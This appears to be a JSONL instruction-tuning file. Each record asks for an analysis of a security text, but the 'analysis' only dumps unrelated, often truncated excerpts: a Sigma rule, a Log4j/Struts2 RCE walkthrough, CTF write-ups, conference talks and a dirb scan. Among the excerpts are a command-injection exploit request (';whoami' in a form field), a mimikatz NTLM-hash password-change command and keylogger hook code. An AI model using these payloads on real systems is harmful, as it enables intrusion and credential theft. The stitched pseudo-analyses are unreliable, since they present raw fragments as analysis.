https://twitter.com/CyberRaiju/status/1273597319322058752 - https://twitter.com/bohops/status/1276357235954909188?s=12 author: Florian Roth date: 2019/06/29 modified: 2020/08/30 tags: - attack.defense_evasion - attack.t1036 logsource: category: process_creation product: windows detection: selection: CommandLine|contains|all: - 'explorer.exe' - ' /root,' condition: selection falsepositives: - Unknown how many legitimate software products use that method level: medium ``` ## 相关TIP [[T1202-win-间接命令执行-基于Forfiles执行payload(白名单)]] [[T1202-win-间接命令执行-基于Pcalua执行payload(白名单)]] ## 参考推荐 MITRE-ATT&CK-T1202 <https://attack.mitre.org/techniques/T1202/> Explorer.exe <https://lolbas-project.github.io/lolbas/Bin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n赛博回忆录星球出品仅供小范围技术交流请勿随意转发进行攻击 赛博回忆录星球出品仅供小范围技术交流请勿随意转发进行攻击 欢迎关注公众号赛博回忆录 赛博 exp 如下 POST /alarmConfig HTTP/1.1 Host: xxx.xxx.xxx.xxx:8443 Connection: close Content-Length: 55 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (cybermemory NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 OPR/48.0.2685.52 cybermemory Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://xxx.xxx.xxx:8443 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://xxx.xxx.xxx.xxx:8443/module/login/login.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: lang=cn x-forwarded-for: xxxx x-originating-ip: xxxxx x-remote-ip: xxxxx x-remote-addr: xxxxx op=testPhone&alarmTestPhone=1;whoami&alarmTestMessage=2 赛博回忆录星球出品仅供小范围技术交流请勿随意转发进行攻击 赛博回忆录星球出品仅供小范围技术交流请勿随意转发进行攻击 赛博代码分析如下 赛博回忆录星球出品仅供小范围技术交流请勿随意转发进行攻击 赛博回忆录星球出品仅供小范围技术交流请勿随意转发进行攻击 未做过滤通过;可拼接命令", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 2021-9-第七届工控信息安全攻防竞赛 --- ## 签到 flag格式flag{xx_xx_xx_xx} 搜索协议s7comm 找到报错点黑色部分得到flag --- ## IEC104 查看压缩包内隐藏的信息flag格式flag{xxx} 伪加密,提取到流量包 搜索 flag ,这个图片中存在一个压缩包 将图片下载,压缩包分离出来,得到 flag.txt 看特征像 AES ,在一开始的压缩包找到KEY 3des 解密得到 flag --- ## error 查看附件以获取flag wireshark 跟踪TCP流 --- ## family_bucket61 根据附件解出flag 凯撒偏移13位 ``` 4B555A58435754494B5A4A554F334B454D565257363453444746454555334C4947464158435343564F42515841554C534752435449565446493533565154434B4F4A4745474E4C4B4E42484545354C454746325653345A584735435453545455 ``` base16 ``` KUZXCWTIKZJUO3KEMVRW64SDGFEEU3LIGFAXCSCVOBQXAULSGRCTIVTFI53VQTCKOJGEGNLKNBHEE5LEGF2VS4ZXG5CTSTTU ``` base32 ``` U3qZhVSGmDecorC1HJmh1AqHUpapQr4E4VeGwXLJrLC5jhNBud1uYs77E9Nt ``` base58 ``` S19AIyRYaCQoMkU8UiNQS1YzbShLX15GMEVtQiVkSl4= ``` base64 ``` K_@#$Xh$(2E<R#PKV3m(K_F0EmB%dJ ``` base85 ``` A';GhG1!.>bJ?]AeA'GP-RZM> ``` base92 ``` XRB1XUR0Z5QKGXSUH3A7 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPenal Codes Relevant to Computer Crime in various Countries United States: Sec. 33.01. DEFINITIONS. In this chapter: (1) \"Access\" means to approach, instruct, communicate with, store data in, retrieve or intercept data from, alter data or computer software in, or otherwise make use of any resource of a computer, computer network, computer program, or computer system. (2) \"Aggregate amount\" means the amount of: (A) any direct or indirect loss incurred by a victim, including the value of money, property, or service stolen or rendered unrecoverable by the offense; or (B) any expenditure required by the victim to verify that a computer, computer network, computer program, or computer system was not altered, acquired, damaged, deleted, or disrupted by the offense. (3) \"Communications common carrier\" means a person who owns or operates a telephone system in this state that includes equipment or facilities for the conveyance, transmission, or reception of communications and who receives compensation from persons who use that system. (4) \"Computer\" means an electronic, magnetic, optical, electrochemical, or other high- speed data processing device that performs logical, arithmetic, or memory functions by the manipulations of electronic or magnetic impulses and includes all input, output, processing, storage, or communication facilities that are connected or related to the device. (5) \"Computer network\" means the interconnection of two or more computers or computer systems by satellite, microwave, line, or other communication medium with the capability to transmit information among the computers. (6) \"Computer program\" means an ordered set of data representing coded instructions or statements that when executed by a computer cause the computer to process data or perform specific functions. (7) \"Computer services\" means the product of the use of a computer, the information stored in the computer, or the personnel supporting the computer, including computer time, data processi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nApache Struts2 RCE via Log4j2 CVE-2021-44228 环境搭建 首先搭建环境 下载源码https://dlcdn.apache.org/struts/2.5.27/struts-2.5.27-all.zip解压 复制struts-2.5.27\\src\\apps\\showcase文件夹到自己的测试目录右键用IDEA打开 配置tomcat启动即可 注确认是否使用log4j2组件 漏洞分析 根据流传的payload中携带的HTTP头字段 If-Modified-Since 找到对应的源码位置下断点 org.apache.struts2.dispatcher.DefaultStaticContentLoader#process 整个调用栈 warn:2774, AbstractLogger (org.apache.logging.log4j.spi) 根据调用栈中的调用情况分析为什么请求会执行到这里 ALT + F7 process:241, DefaultStaticContentLoader (org.apache.struts2.dispatcher) findStaticResource:215, DefaultStaticContentLoader (org.apache.struts2.dispatcher) executeStaticResourceRequest:59, ExecuteOperations (org.apache.struts2.dispatcher) doFilter:81, StrutsExecuteFilter (org.apache.struts2.dispatcher.filter) internalDoFilter:193, ApplicationFilterChain (org.apache.catalina.core) doFilter:166, ApplicationFilterChain (org.apache.catalina.core) doFilter:65, SiteMeshFilter (com.opensymphony.sitemesh.webapp) internalDoFilter:193, ApplicationFilterChain (org.apache.catalina.core) doFilter:166, ApplicationFilterChain (org.apache.catalina.core) doFilter:92, StrutsPrepareFilter (org.apache.struts2.dispatcher.filter) internalDoFilter:193, ApplicationFilterChain (org.apache.catalina.core) doFilter:166, ApplicationFilterChain (org.apache.catalina.core) invoke:196, StandardWrapperValve (org.apache.catalina.core) invoke:97, StandardContextValve (org.apache.catalina.core) invoke:544, AuthenticatorBase (org.apache.catalina.authenticator) invoke:135, StandardHostValve (org.apache.catalina.core) invoke:81, ErrorReportValve (org.apache.catalina.valves) invoke:698, AbstractAccessLogValve (org.apache.catalina.valves) invoke:78, StandardEngineValve (org.apache.catalina.core) service:364, CoyoteAdapter (org.apache.catalina.connector) service:624, Http11Processor (org.apache.coyote.http11) process:65, AbstractProcessorLight (org.apache.coyote) process:831, AbstractProtocol$ConnectionHandler (org.apache.coyote) doRun:1650, NioEndpoint$SocketProcessor (org.apache.tomcat.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSk3wlDbg: Emulating all (well many) of the things with Ida Chris Eagle Sk3wl 0f r00t Disclaimer  Everything I say today is my own opinion and not necessarily the opinion of my employer and certainly not the opinion of DARPA Who am I?  Senior lecturer of computer science  Computer security researcher  Reverse engineer  Inveterate Capture the Flag player  Performer of stupid IDA tricks Introduction  CPU emulators are useful in a variety of cases  System design before hardware is available  Running code from obsolete platforms  Studying code without need to stand up full hardware system  Some emulators go well beyond CPU to emulate full system including hardware Goals  Make lightweight CPU emulator available in a static reverse engineering context  Temporarily step away from reading a disassembly to confirm behavior  Incorporate results of a computation back into a static analysis End result - Sk3wlDbg  Lightweight emulator integrated into a disassembler  Disassembler  IDA Pro  Emulator  Unicorn Engine IDA Pro  Commercial disassembler  Supports many processor families  Integrated debugger supports x86 and ARM targets  Decompiler  32/64 bit x86  32/64 bit ARM Unicorn Engine  Announced at BlackHat USA 2015  Same people that did Capstone  http://www.unicorn-engine.org/  Emulator framework based on QEMU  Supports x86, x86-64, ARM, ARM64, Sparc, MIPS, M68k  Related projects  http://www.unicorn-engine.org/showcase/ Some other, high profile emulators  Bochs  Bochs is a highly portable open source IA-32 (x86) PC emulator written in C++  http://bochs.sourceforge.net/  QEMU  QEMU is a generic and open source machine emulator and virtualizer.  http://www.qemu.org Emulators and IDA Pro  2003 ida-x86emu  For deobfuscating x86 binaries  2009 Hex-Rays adds Bochs debugger module  2014 msp430 for use with microcorruption  https://microcorruption.com  2016 Unicorn integration  Because why not Rationale  Looked at QEMU and Bochs briefly when writing ida-x86emu  Much too heavy weight for ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n从键盘钩子木马到无线键鼠套装劫持 演讲人石冰 2 0 1 8 PART 01 键盘Hack 目录 CONTENTS PART 02 键盘钩子木马 PART 03 无线键鼠 套装劫持 PART 04 安全建议 01 02 03 04 针对键盘的攻击思路分析 PART 01 键盘Hack 键盘最常见的输入设备之一 物理键盘 虚拟键盘 机械键盘 ATM机键盘 软键盘 手机键盘 计算机键盘分类 计算机键盘 编码键盘键盘控制电路的功能 完全靠硬件完成 非编码键盘键盘控制电路的 功能由硬件和软件共同实现 数字电路 对应按键ASCII码 查询程序 传送程序 译码程序 便于重定义 应用广泛 非编码键盘的短板键位冲突 搓招搓不出来  Ghost Key鬼键 为避免送出错误信号而选择忽略信号 键帽 手指按压薄膜式键盘按键的过程 橡胶弹性垫 导电层1 绝缘层 为键帽在按下时提供足够的弹性 负责连通键盘底部的两层薄膜上的触点 导电层2 触点1 触点2 中心圆孔 Q W A S R1 R2 C1 C2 矩阵示意图 C1 C1 9 9 9 Q R1 A R2 9 9 W S 9 电路图 Q W A S R1 R2 C1 C2 矩阵示意图 C1 C1 9 9 9 Q R1 A R2 9 9 W S 9 电路图 按下Q键 Q W A S R1 R2 C1 C2 矩阵示意图 C1 C1 9 9 9 Q R1 A R2 9 9 W S 9 电路图 按下QS键 Q W A S R1 R2 C1 C2 矩阵示意图 C1 C1 9 9 9 Q R1 A R2 9 9 W S 9 电路图 按下QWA键 鬼键 W W A S D W A S D U I O 搞键盘 键盘钩子木马 木马程序后台静默记录 射频信号分析 键鼠&适配器射频技术通信 New idea ATM键盘外设攻击ATM Skimmer 伪装键盘面板 搭配插卡口和针 孔摄像效果更佳 ATM热感摄像机攻击 l 热感摄像机分辨并记录物体表面温度生成热 量分布图 l 人体体温37左右触摸键盘时产生的温度可以 被摄像机捕捉并根据热量大小判断按键顺序 l ATM机键盘由塑料改为金属 ATM BadUSB物理接入 首先得开锁(不适用国内ATM机环境) Tyupkin木马 Ploutus malware Triton ATM 钥匙ebayamazon有售 OS攻击 ATM攻击 xp粘滞键后门案例 传统键盘记录器思路分析 PART 02 键盘钩子木马 Windows系统的地基事件驱动模型 应用程序 应用程序 应用程序 Windows消息队列 系统消息队列 应用程序消息队列 操作系统应用程序和硬件设备 应用程序 操作系统 I/O设备 消息队列 操作系统能感知输入输出设备的状 态变化如鼠标单击按键按下等 不直接处理 封装成Msg转交应用程序 钩子拦截系统发 送给其它应用程序 的消息 Windows下的钩子剖析 线程钩子只监视指定的线程 既可以是exe也可以是dll 进程钩子监视系统中所有线程 必须是dll SetWindowsHookEx(int idHook,HOOKPROC lpfn, HINSTANCE hMod,DWORD dwThreadId) l 设置钩子: SetWindowsHookEx l 释放钩子: UnhookWindowsHookEx l 继续钩子: CallNextHookEx 指定具体ID表示线程钩子 设置为0表示全局钩子 LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) { PKBDLLHOOKSTRUCT key = (PKBDLLHOOKSTRUCT)lParam; //a key was pressed if (wParam == WM_KEYDOWN && nCode == HC_ACTION ) { DoSomething(key); } return CallNextHookEx(keyboardHook, nCode, wParam, lParam); } key->vkCode 记录用户按键 屏蔽用户按键 修改用户按键  int main() { keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc, NULL, NULL); MSG msg{ 0 }; //application loop while (GetMessage(&msg, NULL, 0, 0) != 0); UnhookWindowsHookEx(keyboardHook); return 0; } int main() { keyboardHook = Se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## FTP2 (pwn, 300p, ? solves) ### PL [ENG](#eng-version) > nc 54.172.10.117 12012 > [ftp_0319deb1c1c033af28613c57da686aa7](ftp) Pobieramy zalinkowany plik i ładujemy do IDY. Jest to faktycznie, zgodnie z opisem, serwer FTP - ten sam co w zadaniu FTP (re 300). Wiemy że flaga znajduje się gdzieś na serwerze. Mamy też username i hasło. Spróbowaliśmy najpierw dorwać się do serwera FTP w cywilizowany sposób - po prostu łącząc się klientem FTP. Niestety, nie wyszło (ani filezilla, ani webowe klienty nie dały rady - jednak widać ten serwer FTP nie był tak kompatybilny jak moglibyśmy liczyć). Napisaliśmy więc trywialnego klienta FTP, łączącego się z serwerem: client.py: ``` import socket import subprocess HOST = '54.175.183.202' s = socket.socket() s.connect((HOST, 12012)) def send(t): print t s.send(t) def recv(): msg = s.recv(9999) print msg return msg recv() send('USER blankwall\\n') recv() send('PASS TkCWRy') recv() recv() while True: print \">>\", i = raw_input() + '\\n' send(i) msg = recv() if 'PASV succesful' in msg: port = int(msg.split()[-1]) print port subprocess.Popen(['python', 'process.py', str(port)]) ``` process.py: ``` import socket import sys HOST = '54.175.183.202' port = int(sys.argv[1]) t = socket.socket() t.connect((HOST, port)) print t.recv(99999999) ``` I tutaj zdarzyła się dziwna rzecz - wylistowaliśmy katalog po połączeniu się (poleceniem LIST), i widzimy plik o nazwie \"flag\" w cwd. Następnie wykonaliśmy polecenie RETR, żeby pobrać ten plik. I... dostaliśmy flagę: `flag{exploiting_ftp_servers_in_2015}` Było to bardzo niespodziewane, i albo to jakiś błąd autorów zadania, albo ktoś wyexploitował zadanie \"po bożemu\" i (nieświadomie?) zostawił flagę w pliku na serwerze czytalnym dla każdego. Tak czy inaczej, tanie 300 punktów do przodu. ### ENG version > nc 54.172.10.117 12012 > [ftp_0319deb1c1c033af28613c57da686aa7](ftp) W download the binary and load it into IDA. It is in fact a FTP server - the same as in the task FTP (re 300). We know that the flag is s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTram control system Hacking in Poland 2008.1 (Stuxnet) Nuclear power plant in Iran 2010.7 Banks and Broadcasting companies 2013.3 Waste water treatment system Hacking in Queensland 2000.4 Roosevelt dam hacking 1998.2 Georgia gov Website defaced 2008.8 Newzeland-Australia Network hacking 2007.9 Pentagon hacking 2007.6 Slammer warm Infection to Nuclear powerplant 2003.1 Train signal system sovic-F worm infection 2003.8  Hacktivism  Malware, social engineering Strategic information war  Intended financial purpose  Attack by discontented people Intended cyber attack-Expert Hacker  Financial purpose  Show-off, Attacks targeted at random  Curiousity General cyber attack-Script kiddy  Targeted attack  Hired hacker  National terrorism  General attack 전 문 성 Current Social unrest Political purpose E X P E R T I S E Scale of damage Cyber attack trends Incident cases over the world - 4 - - 5 - Military Energy Transportation Banking E-Government Information & Telecommunications Health - 6 - - 7 - - 9 - - 10 - - 11 - - 12 - Committee on Information Infrastructure Protection (CIIP) Managemen t organization Disseminate the guidelines for protection plan establishment Submit the protection plan Check protection plan implementation Recommend infrastructure designation Disseminate the guidelines for protection measures establishment Proposing major agendas such as the protection plan Organizing the incident response headquarters Designate new infrastructure Submit protection measures Notify security incident Administration -Related organization Financial institutions Communica- tion-related organization Energy facilities Transportatio n-related institutions Etc. Related central administrative agencies Institutions for protection and support of CII - KISA - Information protection professional service company - ISAC - National security research institute Technical support Vulnerability analysis/ evaluation Etc. - 13 - - 15 - - 16 - - 17 - Vulnerability analysis Vulnerability evaluation ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLawful Interception of IP Lawful Interception of IP Traffic: Traffic: The European Context The European Context Jaya Baloo Jaya Baloo BLACKHAT BLACKHAT July 30, 2003 July 30, 2003 Las Vegas, Nevada Las Vegas, Nevada Contents Contents Introduction to Lawful Interception Introduction to Lawful Interception Interception of Internet services Interception of Internet services Origins in The European Community Origins in The European Community The European Interception Legislation in Brief The European Interception Legislation in Brief ETSI ETSI The Dutch TIIT specifications The Dutch TIIT specifications Interception Suppliers & Discussion of Techniques Interception Suppliers & Discussion of Techniques Future Developments & Issues Future Developments & Issues Introduction to Lawful Interception Introduction to Lawful Interception ETSI definition of (lawful) interception: ETSI definition of (lawful) interception: interception: interception: action (based on the law), action (based on the law), performed performed by an network operator/access by an network operator/access provider/service provider (NWO/AP/SvP), of provider/service provider (NWO/AP/SvP), of making available certain information and making available certain information and providing that information to a law enforcement providing that information to a law enforcement monitoring facility. monitoring facility. Network Operator, Access Provider or Service Provider Law Enforcement Agency (LEA) Law Enforcement Monitoring Facility LI order Deliver requested information LI LIs Raison D s Raison Detre etre Why intercept? Why intercept? Terrorism Terrorism Pedophilia rings Pedophilia rings Cyber stalking Cyber stalking Data theft Data theft Industrial espionage Industrial espionage Drug dealers on the internet Drug dealers on the internet Why not? Why not? Privacy Privacy Security Security Legal Issues in LI Legal Issues in LI Judge: \"Am I not to hear the truth?\" Judge: \"Am I not to hear the truth?\" Objecting Counsel:", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecure SofwareDevelopment LifeCycle 为您构架安全的业务系统 企业最佳安全实践 系统安全 网络安全 应用安全 1990-2017 2002-2017 2006-2017 网络攻击的方向 木桶原理 安全攻击最薄弱环节的攻击 安全问题最薄弱环节的集群式爆发 最薄弱环节的攻击 没有考虑安全设计的业务系统理论上安全风险较高 没有经过长时间考验的业务系统实际安全风险较高 没有经过验证的业务逻辑带来的新形式的攻击较多 最新业务的攻击 漏洞 防御 体系 威胁 防御 体系 漏洞防御体系 依照漏洞思维来建立的防御系统 1既有漏洞的安全经验 2测试发现的漏洞情况 优势简单快速高效 劣势不够全面攻击样板点需要足够未知风险较高 现状目前互联网主流模式大量SRC起来的原因都在此 威胁防御体系 通过建立威胁模型来充分发现软件产品中的威胁在设 计开发测试运维等各个角度来削减威胁最后达到 一个动态的平衡 优势系统全面成本可控 劣势体系建设需要一个周期全员质量 现状目前行业仅TOP 100强开始超这个思路建设 软件安全建设思路 安全防御体系 增加攻击成本 网络安全 降低安全风险 敏捷开发环境特别在DevOps模式下留给 安全测试人员的时间非常有限无法充分发现 安全问题 敏捷开发模式下安全测试 01 在开发环境中安全人员数量有限多项目并 行交付上线过程中无法进行充分的安全测 试 多项目并行环境 02 目前软件开发过程中会引入大量的第三方组 件第三方组件的安全问题爆发会导致整个 产品的安全问题 第三方代码带来的安全问题 03 在线系统出现问题后如何快速解决以及溯源 应急响应机制 04 面临 挑战 软件安全开发生命周期主要目的是通 过系统的体系帮助软件开发厂商在需 求设计开发测试部署上线等各 个阶段降低安全风险提升安全能力 安全设计 设计 安全测试 测试 安全需求 需求 安全开发 开发 S-SDLC 软件安全开发生命周期 部署 上线 安全风险 Security Risk Network Application Mobile Cloud IoT Mobile TOP 10 Risk M1-平台使用不当 M2-不安全的数据存储 M3-不安全的通信 M4-不安全的身份验证 M5-加密不足 M6-不安全的授权 M7-客户端代码质量问题 M8-代码篡改 M9-逆向工程 M10-无关的功能 OWASP TOP 10 A1  注入 A2 失效的身份认证和会话管理 A3 跨站脚本 XSS A4  不安全的直接对象引用 A5 安全配置错误 A6 敏感信息泄漏 A7  功能级访问控制缺失 A8 跨站请求伪造  CSRF A9  使用含有已知漏洞的组件 A10  未验证的重定向和转发 IoT TOP 10 I1  不安全的Web界面 I2 不完备的认证授权机制 I3 不安全的网络服务 I4  缺乏传输加密 I5 隐私处理存在问题 I6 不安全的云环境 I7 不安全的移动设备环境 I8 不完备的安全配置 I9 不安全的软件固件 I10 薄弱的物理安全保护 100%的IoT设备接受123456这样的弱密码 100%的IoT设备没有闭锁机制 100%的IoT设备有枚举风险 70%的IoT设备的SSH通道有root帐号权限 60%的IoT设备的web页面有XSS和SQL injection问题 70%的IoT设备没有加密机制 80%的IoT设备收集用户个人信息 90%的IoT设备没有多重认证机制 90%的IoT设备的软件升级过程有安全漏洞 安全风险导致问题 IoT全球DDOS攻击案例 安全风险削减过程 Security Risk Reduction 威胁 分析 安全 设计 安全 开发 安全 测试 安全 部署 建立安全开发体系 S-SDLC 需求 设计 开发 测试 部署和 运维 - 风险评估 - 威胁建模 - 设计审核 - 攻击面分析 - 安全开发 - 代码审核 - 安全测试 - 渗透测试 - 安全加固 - 补丁管理 - 漏洞管理 - 安全事件响应 - 风险评估模板 - 威胁库 - 设计审核模板 - 公共安全组件 - 静态分析工具 - 动态分析工具 - 第三方渗透测 试 - 安全基线 - 扫描监控 管理工具 培训政策组织能力 敏捷开发模式 S-SDLC  环境初始 化  威胁建模  安全开发  持续集成  自动化部署  安全运维  持续测试  更新设计  代码审核  渗透测试 设计 开发 测试 部署 THANKS www.seczone.cn 4000-983-183", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMac OS X Server Command-Line Administration For Version 10.3 or Later 034-2454_Cvr 10/15/03 11:47 AM Page 1  Apple Computer, Inc.  2003 Apple Computer, Inc. All rights reserved. The owner or authorized user of a valid copy of Mac OS X Server software may reproduce this publication for the purpose of learning to use such software. No part of this publication may be reproduced or transmitted for commercial purposes, such as selling copies of this publication or for providing paid for support services. The Apple logo is a trademark of Apple Computer, Inc., registered in the U.S. and other countries. Use of the keyboard Apple logo (Option-Shift-K) for commercial purposes without the prior written consent of Apple may constitute trademark infringement and unfair competition in violation of federal and state laws. Apple, the Apple logo, AirPort, AppleScript, AppleShare, AppleTalk, ColorSync, FireWire, iMac, Keychain, Mac, Macintosh, Power Mac, Power Macintosh, QuickTime, Sherlock, and WebObjects are trademarks of Apple Computer, Inc., registered in the U.S. and other countries. Extensions Manager and Finder are trademarks of Apple Computer, Inc. 034-2354/10-24-03 LL2354.book Page 2 Monday, October 20, 2003 9:47 AM 3 1 Contents Preface 11 About This Book 11 Notation Conventions 11 Summary 11 Commands and Other Terminal Text 11 Command Parameters and Options 12 Default Settings 12 Commands Requiring Root Privileges Chapter 1 13 Typing Commands 13 Using Terminal 14 Correcting Typing Errors 14 Repeating Commands 14 Including Paths Using Drag-and-Drop 15 Commands Requiring Root Privileges 16 Sending Commands to a Remote Server 16 Sending a Single Command 17 Updating SSH Key Fingerprints 17 Notes on Communication Security and servermgrd 18 Using Telnet 18 Getting Online Help for Commands 19 Notes About Specific Commands and Tools 19 serversetup 19 serveradmin Chapter 2 21 Installing Server Software and Finishing Basic Setup 21 Installing Server Software 21 Automating Server Set", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCredit Card Networks 101 What they are, and how to secure them by Robert Imhoff-Dousharm About this document While this serves as a simi-detailed account of said speech at Def-Con 11, it does leave holes in material to be presented. Some things are better spoken out, and better interpreted by mannerisms and body language, or even overhead projector diagrams. Further, as I do hope this is at high levels of information to assist in learning of credit card networks, it cannot be complete due to exploits, and resolutions, unknown to me. My knowledge of this technologies my increase by the time this paper is published, and at a \"best effort\" I will disclose such information, if lacking here in. For these reason, please do not attribute below information as full, when considering \"propagating\" elsewhere. Please also note that I will refer to mostly hotels and resorts in the document. These vendors have the largest vulnerable target currently in the credit card market. They are also more likely to have these type of systems due to their sheer size. Other market segments do have this networks, if you would like to know more about them, please drop the author a line Introduction Credit card networks have grown into a viable and necessary asset in large transaction based businesses. Are these networks protected? Are there formal security measures to protect these packets from external, and internal threats? Most network administrators, controllers(CTO) and CIO's are not even aware of credit card's flow or existence on a network. Further some over protect their switched network, disabling these systems from working correctly. One needs to have knowledge of these networks, know the possible exploits, and how to secure them. Part 1 What are credit card networks, and what is their base design + introduction to credit card flow to bank Section 1 How Credit card data gets from point A to point B So what is the flow of credit cards? Does your card get swiped, then magically the mone", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHiveNightmare /SeriousSAM 利用补充 这https://t.zsxq.com/2R7mY3J中有部门利用不够完善在这儿补充下 mimiktz利用 mimiktz的作者本杰明的更新速度是真的快windows上的实时利用基本不出3天就更新出来闲话不 多说当我们有了hash以后我们怎么提权呢上次说了使用setntml或者changentml这个mimiktz也 是有的因此可以直接使用mimiktz照顾新手同学我想了想还是补充下 不只是SAM可读 SECURITYSYSTEM文件中还有其他很多密钥有了这些我们能够做什么需要大家一起想想了 DPAPI computer keys 机器账号银票 默认密码我这儿没有默认密码 config下面还有很多hive文件hive文件是一个二进制文件需要解析regf的结构推荐一个工具 OfflineRegistryFinder你还能从中发现什么需要大家一起挖掘了 misc::changentml /user:\"redteam\" /oldntml:8cadacb552df1d62e45e68997943c836 /newpassword:okpassword", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Crazy and Radical Corruption Category: Forensics ## Description > Corruption can be critical, but sometimes it can be detected and fixed (unlike Ducky's super secret hacker attacks ). A zip file was attached. ## Solution From the challenge title we can already guess that we will be dealing with CRC mismatches. However, it's not very clear what we were supposed to do in this challenge since it was possible to extract the flag without problems. We get a ZIP file which is corrupted: ```console root@kali:/media/sf_CTFs/technion/Crazy_and_Radical_Corruption# unzip -t crazy_and_radical_corruption.zip Archive: crazy_and_radical_corruption.zip testing: crazy_and_radical_corruption.png bad CRC b424e46f (should be 00000000) At least one error was detected in crazy_and_radical_corruption.zip. ``` Even though the CRC is incorrect, modern tools can successfully extract the contents without a problem. However, for the sake of the writeup, we'll run a command to try and fix the mismatch: ```console root@kali:/media/sf_CTFs/technion/Crazy_and_Radical_Corruption# zip -F crazy_and_radical_corruption.zip --out new.zip Fix archive (-F) - assume mostly intact archive Zip entry offsets do not need adjusting copying: crazy_and_radical_corruption.png zip warning: Local Entry CRC does not match CD: crazy_and_radical_corruption.png root@kali:/media/sf_CTFs/technion/Crazy_and_Radical_Corruption# unzip -t new Archive: new.zip testing: crazy_and_radical_corruption.png OK No errors detected in compressed data of new.zip. ``` After unzipping the archive, we get a PNG file which is again corrupted: ```console root@kali:/media/sf_CTFs/technion/Crazy_and_Radical_Corruption# pngcheck crazy_and_radical_corruption.png crazy_and_radical_corruption.png CRC error in chunk IDAT (computed 8c4c671d, expected 00000000) ERROR: crazy_and_radical_corruption.png ``` However, again - the flag is visible enough and can be extracted without further actions. For the sake of the writeup, we'll fix it too. [PCRT](htt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPassword Cracking on a Budget Matt Weir Dr. Sudhir Aggarwal Florida State University Special Thanks To  Bill Glodek  Professor Breno de Medeiros  National Institute of Justice About Me  Name - Matt Weir  Occupation - PhD Student, Florida State University  Previously worked for Northrop Grumman TASC - Network Security Engineer - Last project I supported forensic investigators working with the JTF-GNO  Disclosed Password - xcom - Real strong, right? Disclaimer  Im a student. I dont crack passwords for a living  Ive been wrong about many things before  Ive probably made just about every mistake possible while learning how to crack passwords  Ive been known to write passwords down How this will be Different from the Shmoocon Talk  What! I cant just use the same slides?  The Shmoocon talk focused on three main areas - The ethics of password cracking - Where we get disclosed password lists to do research on - Our analysis of those password lists and an overview of how people actually create passwords  You can see a video of that talk + slides at www.shmoocon.org This is Defcon  All that information is neat but... - How do you go about applying this in real life? - Without having to spend a lot of money - Note: That being said, having money to throw around makes things a lot easier Because this is a 50 minute talk...  Ill be available to answer questions, go into more detail, rant, and listen to better ideas afterwards  You can also e-mail me - weir@cs.fsu.edu  Its important to me that this research actually helps somebody Getting the Tools  Weve developed a lot of custom tools and scripts to make cracking passwords easier  While they are included on the Defcon CD, you can get the most up to date versions at the following website  www.ecit.fsu.edu - Select Password Recovery Tools Password Basics I want to avoid giving everyone a CISSP prep course on password cracking That being said, if you have questions, please ask them Two types of password cracking  Online - Trying dif", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDIRB官方地址 http://dirb.sourceforge.net/ ### 简介摘自官方原文 > DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analizing the response. ### 介绍 DIRB是一个基于命令行的工具依据字典来爆破目标Web路径以及敏感文件它支持自定义UAcookie忽略指定响应吗支持代理扫描自定义毫秒延迟证书加载扫描等是一款非常优秀的全方位的目录扫描工具同样Kaili内置了dirb **攻击机** 192.168.1.104 Debian **靶机** 192.168.1.102 Windows 2003 IIS ![](media/c3fcc5b823e0595a4cfc3182450ede90.jpg) ### 普通爆破 ```bash root@John:~/wordlist/small# dirb http://192.168.1.102 ./ASPX.txt  DIRB v2.22 By The Dark Raver  START_TIME: Sun Feb 17 23:26:52 2019 URL_BASE: http://192.168.1.102/ WORDLIST_FILES: ./ASPX.txt  GENERATED WORDS: 822  Scanning URL: http://192.168.1.102/  + http://192.168.1.102//Index.aspx (CODE:200|SIZE:2749) + http://192.168.1.102//Manage/Default.aspx (CODE:302|SIZE:203)  END_TIME: Sun Feb 17 23:26:56 2019 DOWNLOADED: 822  FOUND: 2 ``` ![](media/db482720c37469309590eccaa2eebb95.jpg) ### 